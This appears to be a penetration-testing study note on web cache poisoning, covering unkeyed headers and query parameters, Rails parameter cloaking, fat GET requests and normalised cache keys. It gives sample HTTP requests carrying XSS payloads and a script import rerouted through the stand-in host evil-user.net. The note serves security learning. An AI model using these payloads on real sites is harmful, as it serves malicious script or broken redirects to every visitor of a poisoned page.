Web cache poisoning

More info about web cache: Web cache

Two phases:

  1. You need to find a way to trigger a response from the back-end server that unintentionally includes a dangerous payload.

  2. After success, you must ensure the response is cached and served to the intended victims.

Constructing a web cache poisoning attack

  1. Identify and evaluate unkeyed inputs

    • Adding random inputs to requests and observing their effect on the response, whether it's directly reflected or triggers a different response.

  2. Elicit a harmful response from the back-end server

    • Evaluate exactly how the website processes it. E.g. see if the input is reflected in the response from the server without being properly sanitized.

  3. Get the response cached

    • A cached response may depend on all kinds of factors, such as the file extension, content type, route, status code, and response headers.

Tip: use Param Miner extension to identify unkeyed inputs (Guess headers)

Exploiting cache design flaws

Web cache poisoning to deliver XSS

Simplest web cache poisoning vulnerability to exploit is when unkeyed input is reflected in a cacheable response without proper sanitization

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: innocent-website.co.uk

HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://innocent-website.co.uk/cms/social.png" />
  • X-Forwarded-Host is being used to dynamically generate an Open Graph image URL

  • X-Forwarded-Host is unkeyed

  • Exploit: X-Forwarded-Host: a."><script>alert(1)</script>"

  • If this response was cached, all users who accessed /en?region=uk would be served this XSS payload

Unsafe handling of resource imports

Some websites use unkeyed headers to dynamically generate URLs for importing resources, such as externally hosted JavaScript files.

GET / HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: evil-user.net
User-Agent: Mozilla/5.0 Firefox/57.0

HTTP/1.1 200 OK
<script src="https://evil-user.net/static/analytics.js"></script>

Web cache poisoning to exploit cookie-handling vulns

GET /blog/post.php?mobile=1 HTTP/1.1
Host: innocent-website.com
User-Agent: Mozilla/5.0 Firefox/57.0
Cookie: language=pl;
Connection: close
  • Premise (as always): Cookie header is unkeyed

  • If the response to this request is cached, then all subsequent users who tried to access this blog post would receive the Polish

Note: It is rare. Cookie-based cache poisoning vulnerabilities are usually quickly identified and resolved because legitimate users often accidentally poison the cache.

Multiple headers

GET /random HTTP/1.1
Host: innocent-site.com
X-Forwarded-Proto: http

HTTP/1.1 301 moved permanently
Location: https://innocent-site.com/random

Exploiting responses that expose too much information

Cache-control directives

A challenge in web cache poisoning is ensuring the harmful response gets cached, often requiring manual trial and error. However, sometimes responses reveal information that helps the attacker successfully poison the cache.

HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800

Vary header

  • The Vary header specifies a list of additional headers that should be treated as part of the cache key even if they are normally unkeyed. For example, it is commonly used to specify that the User-Agent header is keyed. If the mobile version of a website is cached, this won't be served to non-mobile users by mistake.

  • You can also:

    • Attack only users with that user agent are affected

    • Work out which user agent was most commonly used to access the site (attack to affect the maximum number of users)

Exploiting cache implementation flaws

The methodology involves the following steps:

  1. Identify a suitable cache oracle

    • A cache oracle is a cacheable page or endpoint that provides feedback on whether a response was cached or served directly from the server, indicated through methods like an HTTP header showing a cache hit, observable changes in dynamic content, or distinct response times. If you can identify a specific third-party cache being used, you can consult its documentation for information on how the default cache key is constructed.

  2. Probe key handling

    • Examine whether the cache performs additional processing on the input when generating the cache key, looking for any hidden attack surface in components that seem to have a key. It's crucial to check for any transformations, such as excluding specific query parameters, the entire query string, or removing the port from the Host header when these are added to the cache key.

  3. Identify an exploitable gadget

    • These gadgets will often be classic client-side vulnerabilities, such as reflected XSS and open redirects.

Unkeyed port

Some caching systems will parse the header and exclude the port from the cache key

  • Consider the earlier case where a redirect URL was dynamically generated based on the Host header. This could enable a denial-of-service attack by adding an arbitrary port to the request, causing all users who visited the home page to be redirected to a non-functional port, effectively disabling the home page until the cache expired

  • If the website allows specifying a non-numeric port, potentially allowing for the injection of an XSS payload

Unkeyed query string

Like the Host header, the request line is usually keyed, but one of the most common cache-key transformations is the exclusion of the entire query string.

Detecting an unkeyed query string

To identify a dynamic page, you check if changing a parameter alters the response. However, if the query string is unkeyed, you'll likely get a cache hit with an unchanged response, making cache-buster parameters ineffective.

You can use alternative cache busters, like adding them to a keyed header that doesn’t affect the app’s behavior.

Accept-Encoding: gzip, deflate, cachebuster
Accept: */*, text/cachebuster
Cookie: cachebuster=1
Origin: https://cachebuster.vulnerable-website.com

Then you can exploit it as usual

Unkeyed query parameters

Some websites only exclude specific query parameters that are not relevant to the back-end application, such as parameters for analytics or serving targeted advertisements. UTM parameters like utm_content.

Tip: use Param Miner extension to identify unkeyed inputs (Guess query params)

========= Send same request (two times) ==========

GET /?first=test1&second=test2 HTTP/2

HTTP/2 200 OK
X-Cache: miss

GET /?first=test1&second=test2 HTTP/2

HTTP/2 200 OK
X-Cache: hit

========= Change value of a one parameter ==========

GET /?first=test1&second=a HTTP/2

HTTP/2 200 OK
X-Cache: miss

GET /?first=test1&second=b HTTP/2

HTTP/2 200 OK
X-Cache: miss

========= Change value of a unkeyed query parameters (utm_content) ==========

GET /?first=test1&utm_content=a HTTP/2

HTTP/2 200 OK
X-Cache: miss

GET /?first=test1&utm_content=b HTTP/2

HTTP/2 200 OK
X-Cache: hit

Exploiting parameter parsing quirks

This happen when back-end identifies distinct parameters that the cache does not. The Ruby on Rails framework, for example, interprets both ampersands (&) and semicolons (;) as delimiters

GET /?keyed_param=abc&excluded_param=123;keyed_param=bad-stuff-here

As the names suggest, keyed_param is included in the cache key, but excluded_param is not. Many caches will only interpret this as two parameters, delimited by the ampersand:

1.    keyed_param=abc
2.    excluded_param=123;keyed_param=bad-stuff-here

Once the parsing algorithm removes the excluded_param, the cache key will only contain keyed_param=abc. On the back-end, however, Ruby on Rails sees the semicolon and splits the query string into three separate parameters:

1.    keyed_param=abc
2.    excluded_param=123
3.    keyed_param=bad-stuff-here

But now there is a duplicate keyed_param. This is where the second quirk comes into play. If there are duplicate parameters, each with different values, Ruby on Rails gives precedence to the final occurrence. The end result is that the cache key contains an innocent, expected parameter value, allowing the cached response to be served as normal to other users. On the back-end, however, the same parameter has a completely different value, which is our injected payload. It is this second value that will be passed into the gadget and reflected in the poisoned response.

Exploiting fat GET support

Although this scenario is pretty rare, you can sometimes simply add a body to a GET request to create a "fat" GET request:

GET /?param=innocent HTTP/1.1

Normalized cache keys

Problem: when you find reflected XSS in a parameter, it is often unexploitable in practice. This is because modern browsers typically URL-encode the necessary characters when sending the request, and the server doesn't decode them.


You send the follow URL to a victim


His browser send the following request

GET /test%3Cscript%3Ealert(1)%3C/script%3E HTTP/2
Host: vulnerable.website.net

HTTP/2 404 Not Found

<p>Not Found: /test<script>alert(1)</script></p>

So, normally this XSS is unexploitable.

Exploitation with normalized cache keys

Some caching implementations normalize keyed input when adding it to the cache key. In this case, both of the following requests would have the same key:

GET /example?param="><test>
GET /example?param=%22%3e%3ctest%3e

When the victim visits the malicious URL, the payload will still be URL-encoded by their browser; however, once the URL is normalized by the cache, it will have the same cache key as the response containing your unencoded payload.

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